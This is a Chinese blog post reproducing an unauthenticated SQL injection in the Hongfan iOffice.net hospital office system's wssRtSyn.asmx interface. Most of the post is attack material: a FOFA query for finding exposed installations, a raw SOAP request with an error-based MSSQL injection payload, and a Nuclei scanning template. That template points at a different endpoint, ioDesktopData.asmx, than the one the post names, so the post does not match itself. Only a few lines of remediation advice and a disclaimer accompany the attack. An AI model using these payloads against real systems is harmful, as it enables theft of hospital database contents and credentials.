【漏洞复现】红帆iOffice.net wssRtSyn接口处存在SQL注入

已于 2024-06-20 15:15:38 修改
阅读量438 收藏 1
点赞数 8
文章标签: .net sql 数据库
于 2024-06-20 15:09:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/139833424
版权

【产品&&漏洞简述】

红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。

红帆iOffice.net wssRtSyn.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

【资产测绘Query】

 

  1. app="红帆-ioffice"
 

 

 

【产品界面】
 

 

 

【poc】
 

 

  1. POST /iOffice/prg/set/wss/wssRtSyn.asmx HTTP/1.1
  2. Host: your-ip
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
  4. Content-Type: text/xml
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  6. Accept-Encoding: gzip,deflate
  7. Connection: Keep-alive
  9. <?xml version="1.0"?>
  10. <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tns="http://iOffice.net/iOffice/ioRtSyn">
  11. <soap:Header />
  12. <soap:Body>
  13. <tns:SubmitLogInfo>
  14. <tns:data>qwe</tns:data>
  15. <tns:ServerHost>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</tns:ServerHost>
  16. </tns:SubmitLogInfo>
  17. </soap:Body>
  18. </soap:Envelope>
 

 

 

【Nuclei-Poc验证】
 

 

  1. id: hongfan-iOffice-wssRtSyn-sqli
  2. info:
  3. name: 红帆iOffice.net wssRtSyn接口处存在SQL注入漏洞
  4. author: 王阿姨介绍的
  5. severity: critical
  6. description: 红帆iOffice.net wssRtSyn接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
  7. reference:
  8. metadata:
  9. verified: true
  10. max-request: 1
  11. fofa-query: FOFA:app="红帆-ioffice"
  12. tags: sqli
  14. requests:
  15. - raw:
  16. - |
  17. POST /iOffice/prg/set/wss/ioDesktopData.asmx HTTP/1.1
  18. Host: {{Hostname}}
  19. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
  20. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  21. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  22. Accept-Encoding: gzip, deflate
  23. Connection: close
  24. Upgrade-Insecure-Requests: 1
  25. SOAPAction: http://tempuri.org/GetDepSchedule
  26. Content-Type: text/xml;charset=UTF-8
  28. <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/">
  29. <soap:Header/>
  30. <soap:Body>
  31. <tem:GetDepSchedule>
  32. <!--type: string-->
  33. <tem:EmpLoginID>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</tem:EmpLoginID>
  34. </tem:GetDepSchedule>
  35. </soap:Body>
  36. </soap:Envelope>
  38. matchers-condition: and
  39. matchers:
  40. - type: word
  41. part: body
  42. words:
  43. - 'SQL Server'
  44. - 'System'
  45. condition: and
  47. - type: status
  48. status:
  49. - 500
 

 

 

【修复建议】
 

1、请联系厂商进行修复。
 2、如非必要,禁止公网访问该系统。
 3、设置白名单访问。
 

 申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

                

        

        

    




    

      

        

            

              
                
                  运维Z叔
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    8
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    1
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  1
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
漏洞复现红帆-ioffice-wssRtSyn-sql注入

				
			

			

				

					知黑而守白
				

				

					03-05
					
					60
					
				

			

		

		

			
				
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。红帆HFOffice wssRtSyn 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。

			
		

	



                

              
                



	

		

			

				
					
红帆OA 多处 SQL注入漏洞复现

				
			

			

				

					0xSec
				

				

					03-04
					
					884
					
				

			

		

		

			
				
红帆iOffice.netioDesktopData.asmx、wssRtSyn.asmx、GetWorkUnit.asmx、udfGetDocStep.asmx等接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

			
		

	



                


  
              

                


	

		

			

				
					
红帆OA(医疗版)漏洞细节未授权SQL注入请求注入数据包


					
最新发布

				
			

			

				

					05-06
				

			

		

		

			
				
红帆OA(医疗版)是**一款专为医疗机构设计的办公自动化软件,旨在提高医院和相关卫生机构的工作效率和管理效能**。其功能特点包括:

1. **日常办公管理**:提供医院日常行政办公所需的基本功能,如文档处理、通知公告、会议管理等。
2. **科室管理**:支持医院内部各科室的管理需求,包括人员管理、资源分配、绩效考核等。
3. **信息集成**:能够整合医院内部的各类信息系统,实现数据共享和业务协同。
4. **多样化的医院类型支持**:适用于不同类型和规模的医院,如大学附属教学医院、综合性医院、专科医院、民营医院和集团医院等。
5. **业务范围广泛**:涵盖行政办公、医务室管理、科研管理、护士排班管理、党政管理和医患关系管理等多个方面。
6. **综合业务管理平台**:结合了卫生主管部门的管理规范和众多行业特色应用,是符合医院行业特点的综合业务管理平台。
7. **丰富的成功案例**:拥有众多成功案例,是医院综合业务管理软件中应用最广泛的之一。

需要注意的是,尽管红帆OA(医疗版)提供了强大的功能和广泛的应用场景,但任何软件系统都可能存在一定的安全风险,例如SQL注入漏洞等。因

			
		

	





	

		

			

				
					
红帆OA udfmr.asmx SQL注入漏洞复现

				
			

			

				

					0xSec
				

				

					08-18
					
					3622
					
				

			

		

		

			
				
红帆iOffice.netudfmr.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

			
		

	



		

			
		



	

		

			

				
					
漏洞复现-红帆OA iorepsavexml.aspx文件上传漏洞(附漏洞检测脚本)

				
			

			

				

					jjjj1029056414的博客
				

				

					12-24
					
					1654
					
				

			

		

		

			
				
漏洞复现-红帆OA iorepsavexml.aspx文件上传漏洞,附带自己写的poc脚本

			
		

	





	

		

			

				
					
红帆OA iorepsavexml接口任意文件上传漏洞复现 [附POC]

				
			

			

				

					薛定谔嘚喵博客
				

				

					12-08
					
					547
					
				

			

		

		

			
				
红帆移动OA系统,是广州红帆电脑科技有限公司基于微软.NET技术研发的,建立以笔记本、手机等便捷终端为载体实现的移动信息化系统。可以连接客户原有的iOffice.net办公平台使手机也可以用以操作、浏览、管理公司的全部工作事务,是iOffice.net办公平台的一个强有力的补充。红帆OA iorepsavexml接口存在任意文件上传漏洞,可上传恶意文件至服务器。

			
		

	





	

		

			

				
					
富力地产应用iOffice.net解决管理难题

				
			

			

				

					03-04
				

			

		

		

			
				
富力地产在面临数据分散、沟通不畅、资料管理混乱、审批繁琐、决策传达不畅以及人事管理复杂等问题时,选择采用红帆的iOffice.net办公自动化系统作为解决方案。iOffice.net是一个跨平台的信息管理平台,它能够提供...

			
		

	





	

		

			

				
					
【软件分享】红帆IE助手

				
			

			

				

					02-18
				

			

		

		

			
				
来源:http://oa.gy3y.com/ioffice/Login.aspx?ReturnUrl=%2fiOffice%2fiOffice.aspx

			
		

	





	

		

			

				
					
红帆OA用户培训.pptx

				
			

			

				

					09-21
				

			

		

		

			
				
红帆OA用户培训是关于iOffice.net信息管理平台的应用培训,该平台旨在提高员工技能和企业智商,实现信息及时、准确、有效地传递。该平台拥有多样化的沟通方式,包括手机短信、即时消息、通知公告、传阅信息、人员...

			
		

	





	

		

			

				
					
IOFFICE-E网络办公系统成功调试版(附SQL数据库)

				
			

			

				

					02-23
				

			

		

		

			
				
源码空间

			
		

	





	

		

			

				
					
漏洞复现-红帆OA系列

				
			

			

				

					aming小老弟
				

				

					03-15
					
					1243
					
				

			

		

		

			
				
红帆OA--------------------------------------------fofa:app=“红帆-ioffice

			
		

	





	

		

			

				
					
红帆OA iocomGetAtt SQL注入漏洞复现

				
			

			

				

					0xSec
				

				

					02-26
					
					763
					
				

			

		

		

			
				
红帆iOffice.netiocomGetAtt.aspx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

			
		

	





	

		

			

				
					
2021 HW 漏洞清单汇总 ( 附 poc )

					
热门推荐

				
			

			

				

					gjgj的博客
				

				

					04-23
					
					1万+
					
				

			

		

		

			
				
2021 HW 漏洞清单汇总

2021.4.8——4.22




披露时间  涉及商家/产品漏洞描述

2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391

 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793

2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...

			
		

	





	

		

			

				
					
漏洞复现红帆OA iorepsavexml.aspx文件上传漏洞

				
			

			

				

					失心少年
				

				

					12-16
					
					1018
					
				

			

		

		

			
				
广州红帆科技深耕医疗行业20余年,专注医院行政管控,与企业微信、阿里钉钉全方位结合,推出web移动一体化办公解决方案——iOffice20(医微云)。提供行政办公、专业科室应用、决策辅助等信息化工具,采取平台化管理模式,取代医疗机构过往多系统分散式管理,实现医院内各科室之间的快速分工合作,并通过整合各类管理应用,让医疗机构管理者随时随地把控医院的运营管理情况,同时为行政管理人员提供便捷多终端的移动协同工具,推进移动办公全面落地,深化互联网+医疗建设,成就面向医疗机构的“智慧管控”。

			
		

	





	

		

			

				
					
漏洞复现红帆-ioffice-CAWS-sql注入

				
			

			

				

					知黑而守白
				

				

					03-05
					
					115
					
				

			

		

		

			
				
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。红帆HFOffice CAWS 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。

			
		

	





	

		

			

				
					
漏洞复现红帆-ioffice-ioDesktopData-sql注入

				
			

			

				

					知黑而守白
				

				

					03-05
					
					118
					
				

			

		

		

			
				
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。红帆HFOffice ioDesktopData 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。

			
		

	





	

		

			

				
					
漏洞复现红帆 HFOffice list 存在SQL注入漏洞

				
			

			

				

					https://blog.echo234.cn/
				

				

					03-28
					
					398
					
				

			

		

		

			
				
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。平台list接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

			
		

	





	

		

			

				
					
OA-命令执行漏洞复现

				
			

			

				

					千寻的博客
				

				

					03-23
					
					2871
					
				

			

		

		

			
				
文章目录0x01介绍0x02原理0x03影响版本0x04环境搭建0x05漏洞复现方法一:通过抓包,改包进行利用方法二:直接利用免责声明本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!
0x01介绍
OA(Office Anywhere网络智能办公系统)办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
OA为各行业不同规模的众多用户提...

			
		

	





	

		

			

				
					
uni-app 微信小程序分享

				
			

			

				

					07-27
				

			

		

		

			
				
uni-app提供了内置的微信分享API,可以通过调用相关方法来实现微信小程序的分享功能。首先,在onLoad方法中使用wx.showShareMenu方法,设置menus将发送给朋友和分享到朋友圈两个按钮都可以点击。具体代码如下:

```javascript
onLoad() {
  wx.showShareMenu({
    withShareTicket: true,
    menus: \["shareAppMessage", "shareTimeline"\]
  })
}
```

接下来,需要分别编写发送给朋友和分享到朋友圈的方法。这两个方法应该与data和methods等同级,不要写到methods里面。具体代码如下:

```javascript
onShareAppMessage(res) {
  if (res.from === 'button') {
    console.log(res.target)
  }
  return {
    title: 'title',
    path: '/pages/hfdt/gztjh',
    mpId: 'wx6bf107b87c455b99'
  }
},
onShareTimeline(res) {
  return {
    title: '胶南街道召开“红帆支部”观摩学习暨工作推进会',
    type: 0,
    summary: ""
  }
}
```

在onShareAppMessage方法中,可以设置分享的标题、路径和微信小程序的AppId。在onShareTimeline方法中,可以设置分享到朋友圈的标题和类型等信息。通过以上步骤,就可以实现uni-app微信小程序的分享功能。\[1\]\[2\]\[3\]
#### 引用[.reference_title]
-  *1* [uniapp 微信分享](https://blog.csdn.net/lxgyydsgod/article/details/126234984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item]
-  *2* *3* [uniapp微信小程序使用分享功能](https://blog.csdn.net/qq_43080548/article/details/125619531)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item]
[ .reference_list ]

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值